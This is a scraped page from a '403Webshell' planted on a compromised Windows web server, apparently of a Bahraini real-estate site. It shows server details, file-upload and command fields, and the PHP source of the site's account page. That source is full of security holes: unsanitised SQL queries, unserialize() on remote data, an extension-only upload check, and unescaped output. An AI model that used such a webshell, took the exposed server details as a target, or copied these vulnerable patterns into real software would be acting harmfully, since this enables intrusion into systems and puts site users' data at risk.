403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/xamppkk/htdocs-khalafsons/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : D:/xamppkk/htdocs-khalafsons/myaccount.php
<html>
<head>
<title>khalafsons.com</title>
<link rel="icon" type="image/jpg" href="http://khalafsons.com/kvt_con/khalaf_log.jpg" />

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="main_css/myaccount.css" >


</head>

<?php 
session_start();
include('db_con.php'); 
include('function.php');
?>

<?php

if(isset($_SESSION['id']))
{
	$my_id = $_SESSION['id'];
    $my_cpr = $_SESSION['user_cpr'];
	
	//echo $_SESSION['id'];
//	echo"$user_email";
}
?>
<input id="my_id" style="display:none;" value="<?php echo"$my_id";?>" />
<input id="my_cpr" style="display:none;" value="<?php echo"$my_cpr";?>" />

 <?php
$user_ip = getenv('REMOTE_ADDR');
$geo = unserialize(file_get_contents("http://www.geoplugin.net/php.gp?ip=$user_ip"));
$city = $geo["geoplugin_city"];
$region = $geo["geoplugin_regionName"];
$country = $geo["geoplugin_countryName"];
/*echo"$user_ip";
echo "City: ".$city."<br>";
echo "Region: ".$region."<br>";
echo "Country: ".$country."<br>";
/*
geoplugin_request
geoplugin_status
geoplugin_credit
geoplugin_city
geoplugin_region
geoplugin_areaCode
geoplugin_dmaCode
geoplugin_countryCode
geoplugin_countryName
geoplugin_continentCode
geoplugin_latitude
geoplugin_longitude
geoplugin_regionCode
geoplugin_regionName
geoplugin_currencyCode
geoplugin_currencySymbol
geoplugin_currencySymbol_UTF8
geoplugin_currencyConverter
*/
?>

<input type="text" id="country_user" class="helping_id" style="display:none;" value="<?php echo $country;?>"> 
<input type="text" id="region_user" class="helping_id" style="display:none;" value="<?php echo $region;?>">
<input type="text" id="city_user" class="helping_id" style="display:none;" value="<?php echo $city;?>">



<script>
/*
function disp_agent_area()
{

document.getElementById('disp_agent_area').style.display="block";

}


function show_agent_contact()
{
document.getElementById('agent_contact_output').style.display="block";	
document.getElementById('call_agent_btn').style.display="none";
}

function show_agent_details()
{
document.getElementById('agent_details_div').style.display="block";	
document.getElementById('disp_agent_area').style.display="none";
document.getElementById('main_home_left').style.display="none";	
}*/

function show_upload_profile_div()
{
document.getElementById('upload_profile_div').style.display="block";		
}
function close_upload_profile_div()
{
document.getElementById('upload_profile_div').style.display="none";		
}


</script>


<body onLoad="star_auto_machine();" >

<div class="main_home">

<div class="main_log">

<img src="kvt_con/khalaf_log.jpg" width="100%" height="100%" style="border-radius:20px;" classk="main_home_icon" />

</div>

<div class="main_home_title">Khala Sons Real Estate</div>

<div class="icon_div_right" >

<img onClick="show_search_area();" src="kvt_con/search_icon.png" class="top_right_icons" />
<a href="https://www.facebook.com/Khalaf-Sons-Real-Estate-WLL-899406336847138/" ><img src="kvt_con/fb_icon.png" class="top_right_icons" /></a>
<!--img src="kvt_con/instagram_icon.png" class="top_right_icons" /-->
<a href="https://www.linkedin.com/company/khalaf-sons-real-estate/?viewAsMember=true" ><img src="kvt_con/linkedin.png" class="top_right_icons" /></a>


</div>

</div>

<div class="postion_main_home"></div>

<div id="main_home_left" class="main_home_left">

<a href="index.php"><button class="left_home_btn" >Home</button></a>
<a href="myaccount.php"><button class="left_home_btn" >Myaccount</button></a>
<a href="agent_page.php"><button class="left_home_btn">Our Agents</button></a>


<?php
	$get_user_pro ="select * from khalaf_usertb where NOT image_url ='avatar2.jpg' AND id='$my_id' ";
	$run_user_pro = mysqli_query($con,$get_user_pro);
	$check_user_pro = mysqli_num_rows($run_user_pro);
	if($check_user_pro > 0){
?>

<button onClick="show_upload_profile_div();" class="left_home_btn">Edit Profile</button>

	<?php }else{ ?>
	
<button onClick="show_upload_profile_div();" class="left_home_btn">upload Profile</button>

<?php } ?>	

<?php if(isset($_SESSION['id'])){ ?>

<a href="log_out.php"><button class="left_home_btn">Log out</button></a>

<?php } ?>

</div>


<div id="upload_profile_div" class="upload_profile_div">

<div onClick="close_upload_profile_div();" class="close_upload_profile_div">x</div>

<div class="profile_input_div">

<form method="post" enctype="multipart/form-data" >

<div style="float:left;width:100%;height:40px;line-height:40px;margin-bottom:10px;text-align:center;font-size:1.3em;color:white;">Upload New Profile ImagesT</div>
<input name="image_file" type="file" style="float:left;width:80%;height:40px;margin-left:10%;background:white;margin-bottom:20px;font-size:1.1em;color:purple;" />
<button name="update_more_profile_images" style="float:left;width:50%;height:40px;margin-left:25%;margin-bottom:20px;font-size:1.1em;border:transparent;background:white;color:purple;border-radius:5px;cursor:pointer;">Upload Image</button>

</form>

<?php
if(isset($_POST['update_more_profile_images'])){
	
	 
	   $profile_image = $_FILES['image_file']['name'];
	   
	   
	   	$type = explode('.',$profile_image);
	    $type =end($type);
		
		if($profile_image==""){
			
			echo"<div style='float:left;width:100%;text-align:center;font-size:1.1em;color:red;'>Fill All The Spaces</div>";
			
			}else{
				
		if($type !=='jpg' && $type !=='png' && $type !=="jpeg" && $type !=='JPG' && $type !=="PNG" && $type !=="JPEG" ){
			
			echo"<div style='float:left;width:100%;text-align:center;font-size:1.1em;color:red;'>Image Format Not Supportedd</div>"; 
		}else{
		
		$random_name =rand();
	    $image_tmp = $_FILES['image_file']['tmp_name'];
		
		
	$get_user_pro ="select * from khalaf_usertb where id='$my_id' ";
	$run_user_pro = mysqli_query($con,$get_user_pro);
	while($row_user_pro = mysqli_fetch_array($run_user_pro))
	{
	$user_image = $row_user_pro['image_url'];
if($user_image !=='avatar2.jpg'){	
    if(!unlink("user_profile_images/".$user_image)){
		
		echo"<div style='float:left;width:100%;text-align:center;font-size:1.1em;color:red;'>Something Went Wrong,Data Not Saved</div>";
		
	}else{
		  $update_profile="update khalaf_usertb set image_url='$random_name.$type' where id='$my_id' ";
	  $run_update_image = mysqli_query($con,$update_profile);
	   if($run_update_image){
		   
		   
		  move_uploaded_file($image_tmp,'user_profile_images/'.$random_name.'.'.$type);
		  
		 echo"<div style='float:left;width:100%;text-align:center;font-size:1.1em;color:green;'>New Profile Image Added</div>"; 
	   
	   }else{
		   
		   echo"<div style='float:left;width:100%;text-align:center;font-size:1.1em;color:red;'>Something Went Wrong,Data Not Saved</div>";
}			
}
}else{
	
	
			  $update_profile="update khalaf_usertb set image_url='$random_name.$type' where id='$my_id' ";
	  $run_update_image = mysqli_query($con,$update_profile);
	   if($run_update_image){
		   
		   
		  move_uploaded_file($image_tmp,'user_profile_images/'.$random_name.'.'.$type);
		  
		 echo"<div style='float:left;width:100%;text-align:center;font-size:1.1em;color:green;'>New Profile Image Added</div>"; 
	   
	   }else{
		   
		   echo"<div style='float:left;width:100%;text-align:center;font-size:1.1em;color:red;'>Something Went Wrong,Data Not Saved</div>";
}
	
	
} 
}
}
}
}

?>

</div>

</div>


<div id="container" class="container">

<?php

	$get_agent ="select * from khalaf_usertb where id='$my_id' ";
	$run_get_agent = mysqli_query($con,$get_agent);
	while($row_get_agent = mysqli_fetch_array($run_get_agent))
	
	{
		$agent_fname = $row_get_agent['first_name'];
		$agent_lname = $row_get_agent['last_name'];
		$agent_image = $row_get_agent['image_url'];
		$agent_tel = $row_get_agent['contact'];
        
?>

<div id="single_disp_agent_div" class="single_disp_agent_div">

<?php
if($agent_image =="avatar2.jpg"){
?>
<div id="single_agent_image_div" onClick="show_agent_details();" class="single_agent_image"><img src="avatar_image/avatar2.jpg" width="100%" height="100%" style="cursor:pointer;" /></div>



<?php  }else{ ?>

<div id="single_agent_image_div"  onClick="show_agent_details();" class="single_agent_image"><img src="user_profile_images/<?php echo"$agent_image"; ?>" widthk="100%" height="100%" style="cursor:pointer;" /></div>

<?php  } ?>

 <div id="menu_mob_div" class="menu_mob_div" >
 <button onClick="show_agent_list_mob();" id="show_agent_list_mob_btn" class="show_agent_list_mob_btn" >Chat with the agent</button>
  <button onClick="close_agent_list_mob();" id="close_agent_list_mob_btn" class="show_agent_list_mob_btn" style="display:none;" >Close agent list</button>
<div class="icon_div_right_mob" >


<img id="show_mob_menu_btn" onClick="show_mob_menu();" src="kvt_con/menu.png" class="top_right_mob_menu_icon" />
<img id="close_mob_menu_btn" onClick="close_mob_menu();" src="kvt_con/close_mob_menu.png" class="top_right_mob_menu_icon" style="display:none;" />

<script>

function show_mob_menu()
{
	//menu_mob_div_size = document.getElementById('main_home_left').offsetWidth;
	screen_size = screen.width;

if(screen_size < 700){
    document.getElementById('single_agent_image_div').style.display="none";
	document.getElementById('agent_list_div').style.display="none";
	document.getElementById('agent_more_info_text').style.display="none";
		
	}else{
			//if(menu_mob_div_size > 100){alert(menu_mob_div_size);
				document.getElementById('single_agent_image_div').style.display="block";

			//}else{
				//document.getElementById('single_agent_image_div').style.display="none";
			//}
		
		}

	
document.getElementById('main_home_left').style.display="block";
document.getElementById('show_mob_menu_btn').style.display="none";
document.getElementById('close_mob_menu_btn').style.display="block";

//document.getElementById('menu_mob_div').style="margin-top:0px;";

//alert('woop');
window.scrollTo(0,0);
}

function close_mob_menu()
{
		screen_size = screen.width;
	//alert(menu_mob_div_size);
	if(screen_size < 700){
		document.getElementById('main_home_left').style.display="none";
		//document.getElementById('agent_list_div').style.display="block";
			document.getElementById('agent_more_info_text').style.display="block";
			document.getElementById('agent_list_div').style.display="none";
						 
	}else{document.getElementById('main_home_left').style.display="block";}
	

document.getElementById('show_mob_menu_btn').style.display="block";
document.getElementById('close_mob_menu_btn').style.display="none";
document.getElementById('single_agent_image_div').style.display="block";
//document.getElementById('menu_mob_div').style="margin-top:-40px;";
window.scrollTo(0,0);

}


function show_agent_list_mob()
{
	document.getElementById('agent_list_div').style.display="block";
	document.getElementById('single_agent_image_div').style.display="none";
	document.getElementById('agent_more_info_text').style.display="none";
	document.getElementById('main_home_left').style.display="none";
	
	document.getElementById('show_agent_list_mob_btn').style.display="none";
	document.getElementById('close_agent_list_mob_btn').style.display="block";
}

function close_agent_list_mob()
{
	document.getElementById('agent_list_div').style.display="none";
	document.getElementById('single_agent_image_div').style.display="block";
	document.getElementById('agent_more_info_text').style.display="block";
	document.getElementById('main_home_left').style.display="none";
	
	document.getElementById('show_agent_list_mob_btn').style.display="block";
	document.getElementById('close_agent_list_mob_btn').style.display="none";
}


</script>

</div><!-- end of icon_div_right_mob-->
 
 </div>



<div id="agent_more_info_text" >
<div class="single_agent_name"><?php echo"$agent_fname";echo" "; echo"$agent_lname"; ?></div>
<div onClick="" class="more_about_agent">Bahrain</div>
<div id="call_agent_btn"  class="call_agent"><?php echo"Mob.$agent_tel"; ?></div>

</div>

</div><!--end of single_disp_agent_div  -->

	<?php } ?>
	

<div id="user_textarea_div" class="user_textarea_div">

<div class="message_header">

 <div id="title_agent_name_sms_out" class="title_agent_name_sms_out"></div> 
 <div onClick="close_user_textarea();" class="close_chat_area">X</div> 
 
 
 </div>

<div id="message_display_output"></div>


<div class="user_text_input_div" >

<textarea id="message_input" class="user_text_input" placeholder="Write a message..." ></textarea>
<button onClick="message_insert();" class="user_text_send_btn">send</button>

</div>


<script>
function close_user_textarea()
{
document.getElementById('user_textarea_div').style.display="none";
	document.getElementById('single_disp_agent_div').style.display="block";
	
	screen_size = screen.width;
	if(screen_size < 700){
    document.getElementById('agent_list_div').style.display="block";
	}
	
}

function show_agent_name_sms(sans)
{
	agent_id_sms = "agent_id_message"+sans;
	agent_name_sms_head = "agent_name_message_head"+sans;
	
	agent_id_out= document.getElementById(agent_id_sms).value;
	agent_name_out= document.getElementById(agent_name_sms_head).value;
	//alert(sans);
	
	document.getElementById("title_agent_name_sms_out").innerHTML = agent_name_out;
	document.getElementById('user_textarea_div').style.display="block";
	
	screen_size = screen.width;
	
	if(screen_size < 700){
	document.getElementById('single_disp_agent_div').style.display="none";
    document.getElementById('agent_list_div').style.display="none";	
	window.scrollTo(0,0);
	}
	

	//alert(agent_id_out);
}

function message_insert()
{
	//alert(agent_id_out);
	user_id = agent_id_out;
	my_id = document.getElementById('my_id').value;
	message_new = document.getElementById('message_input').value;
	
	xmlhttp = new XMLHttpRequest();
	
	xmlhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
       // Typical action to be performed when the document is ready:
      // document.getElementById("demo").innerHTML = xhttp.responseText;
    }
};
	xmlhttp.open("GET","khalaf_auto.php?my_id="+my_id+"&user_id="+user_id+"&message_new="+message_new+"&status=insert_new_message",false);
	xmlhttp.send(null);
	 document.getElementById('message_input').value="";
	 
display_messages(user_id);

}

//display_messages();
function display_messages(dm)
{

	my_id = document.getElementById('my_id').value;
	user_id = dm;

	xmlhttp = new XMLHttpRequest();
	
	xmlhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
       // Typical action to be performed when the document is ready:
       document.getElementById("message_display_output").innerHTML = xmlhttp.responseText;
    }
};
	xmlhttp.open("GET","khalaf_auto.php?my_id="+my_id+"&user_id="+user_id+"&status=display_message",false);
	xmlhttp.send(null);
//document.getElementById("message_display_output").innerHTML = xmlhttp.responseText;

}


</script>

</div>	



<div id="agent_list_div" class="agent_list_div">

<div class="agent_list_title">Chat Agent List</div>

<?php

	$get_agent ="select * from khalaf_agenttb where NOT id='$my_id' ";
	$run_get_agent = mysqli_query($con,$get_agent);
	while($row_get_agent = mysqli_fetch_array($run_get_agent))
	
	{
		$agent_id = $row_get_agent['user_id'];

	$get_user ="select * from khalaf_usertb where id='$agent_id'";
	$run_get_user = mysqli_query($con,$get_user);
	while($row_get_user = mysqli_fetch_array($run_get_user)){
	
	    $id_user = $row_get_user['id'];
		$agent_fname = $row_get_user['first_name'];
		$agent_lname = $row_get_user['last_name'];
		$agent_image = $row_get_user['image_url'];
		$agent_tel = $row_get_user['contact'];
        
?>

<div class="single_agent_list">

<div class="single_agent_list_image">

<?php
if($agent_image =="avatar2.jpg"){
?>
<img onmouseup="display_messages(this.id);" onClick="show_agent_name_sms(this.id);" id="<?php echo"$id_user";?>" src="avatar_image/avatar2.jpg" width="100%" height="100%" style="cursor:pointer;" />

<?php  }else{ ?>

<img onmouseup="display_messages(this.id);" onClick="show_agent_name_sms(this.id);" id="<?php echo"$id_user";?>" src="user_profile_images/<?php echo"$agent_image"; ?>" width="100%" height="100%" style="cursor:pointer;" />
 
<?php  } ?>

</div>


<div class="single_agent_list_name"><?php echo"<span onmouseup='display_messages(this.id);' onClick='show_agent_name_sms(this.id);' id='$id_user' style='cursor:pointer;'>"; echo"$agent_fname";echo" "; echo"$agent_lname"; echo"</span>"; ?></div>

<input id="agent_id_message<?php echo"$id_user"; ?>" value="<?php echo"$id_user"; ?>" style="display:none;"/>
<input id="agent_name_message_head<?php echo"$id_user"; ?>" value="<?php echo"$agent_fname";echo" "; echo"$agent_lname"; ?>" style="display:none;" />

</div>

<?php  } } ?>

</div>


</div><!--end of container -->





<div class="main_remmie">@Khalaf Sons Real Estate</div>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit